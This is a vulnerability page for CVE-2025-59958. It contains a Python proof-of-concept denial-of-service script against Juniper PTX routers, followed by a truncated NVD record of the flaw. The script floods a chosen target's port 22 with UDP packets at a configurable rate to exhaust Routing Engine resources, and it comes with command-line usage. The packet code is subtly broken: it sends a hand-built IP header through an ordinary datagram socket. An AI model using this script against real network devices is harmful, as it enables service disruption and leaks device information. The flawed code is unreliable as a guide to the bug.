CVE-2025-59958

# CVE-2025-59958 PoC - Juniper Junos OS Evolved PTX Firewall Filter Reject Resource Exhaustion # This PoC demonstrates triggering the Improper Check for Unusual or Exceptional Conditions # in the PFE by sending packets that match output firewall filter 'reject' terms. import socket import struct import time import sys def build_probe_packet(dst_ip, dst_port=0): """ Build a simple UDP/TCP packet to trigger the 'reject' action in an output firewall filter configured on a PTX Series device. The packet should match a 'reject' term in the output filter. """ # Simple IP header (no actual L2 framing needed for raw socket testing) version_ihl = (4 << 4) | 5 # IPv4, IHL=5 (20 bytes) tos = 0 total_length = 28 # IP header (20) + UDP header (8) identification = 0x1234 flags_offset = 0 ttl = 64 protocol = 17 # UDP checksum = 0 src_ip = socket.inet_aton("10.0.0.1") dst_ip_bytes = socket.inet_aton(dst_ip) ip_header = struct.pack("!BBHHHBBH4s4s", version_ihl, tos, total_length, identification, flags_offset, ttl, protocol, checksum, src_ip, dst_ip_bytes) # UDP header src_port = 12345 udp_length = 8 udp_checksum = 0 udp_header = struct.pack("!HHHH", src_port, dst_port, udp_length, udp_checksum) return ip_header + udp_header def exploit(target_ip, duration=60, pps=100): """ Send a continuous stream of packets to trigger resource consumption on the Routing Engine via the erroneous reject-handling path. Args: target_ip: IP address of the target PTX device's WAN/revenue interface duration: How long to send packets (seconds) pps: Packets per second to send """ print(f"[*] Targeting {target_ip}") print(f"[*] Duration: {duration}s, Rate: {pps} pps") print("[*] Sending packets matching output firewall 'reject' terms...") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) interval = 1.0 / pps end_time = time.time() + duration count = 0 try: while time.time() < end_time: # Send to a port that would match a 'reject' term # (e.g., a blocked service port configured in the output filter) packet = build_probe_packet(target_ip, dst_port=22) # SSH port commonly rejected sock.sendto(packet, (target_ip, 22)) count += 1 time.sleep(interval) except KeyboardInterrupt: print("\n[!] Interrupted by user") finally: sock.close() print(f"[+] Sent {count} packets in {duration}s") print("[+] Check target RE resource utilization for impact") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [duration] [pps]") print(f"Example: {sys.argv[0]} 192.168.1.1 60 100") sys.exit(1) target = sys.argv[1] dur = int(sys.argv[2]) if len(sys.argv) > 2 else 60 rate = int(sys.argv[3]) if len(sys.argv) > 3 else 100 exploit(target, dur, rate)

{"cve": {"id": "CVE-2025-59958", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:45.950", "lastModified": "2026-01-23T18:36:15.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Check for Unusual or Exceptional Conditions vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS Evolved on PTX Series allows an unauthenticated, network-based attacker to cause impact to confidentiality and availability.\n\nWhen an output firewall filter is configured with one or more terms where the action is 'reject', packets matching these terms are erroneously sent to the Routing Engine (RE) and further processed there. Processing of these packets will consume limited RE resources. Also responses from the RE back to the source of this traffic could reveal confidential information about the affected device.\nThis issue only applies to firewall filters applied to WAN or revenue interfaces, so not the mgmt or lo0 interface of the routing-engine, nor any input filters.\n\nThis issue affects Junos OS Evolved on PTX Series:\n\n\n\n * all versions before 22.4R3-EVO,\n * 23.2 versions before 23.2R2-EVO."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:M/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.4", "matchCriteriaId": "A9925263-E7B7-49AA-8271-AF320F355B80"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:-:*:*:*:*:*:*", "matchCriteriaId": "0A33C425-921F-4795-B834-608C8F1597E0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:r1:*:*:*:*:*:*", "matchCriteriaId": "93887799-F62C-4A4A-BCF5-004D0B4D4154"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "62C473D2-2612-4480-82D8-8A24D0687BBD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "7FB4C5CA-A709-4B13-A9E0-372098A72AD3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:r2:*:*:*:*:*:*", "matchCriteriaId": "04CE952D-E3C1-4B34-9E65-EC52BFE887AB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "8AE9D1A7-4721-4E1D-B965-FDC38126B1DD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "A8643AA3-29EF-48A7-B033-CB60988E214B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.2:-:*:*:*:*:*:*", "matchCriteriaId": "6DEAA7FD-385F-4221-907E-65ABC16BE4BE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.2:r1:*:*:*:*:*:*", "matchCriteriaId": "DDEC008A-3137-48D1-8ABC-6DB0EFC40E50"}, { ... (truncated)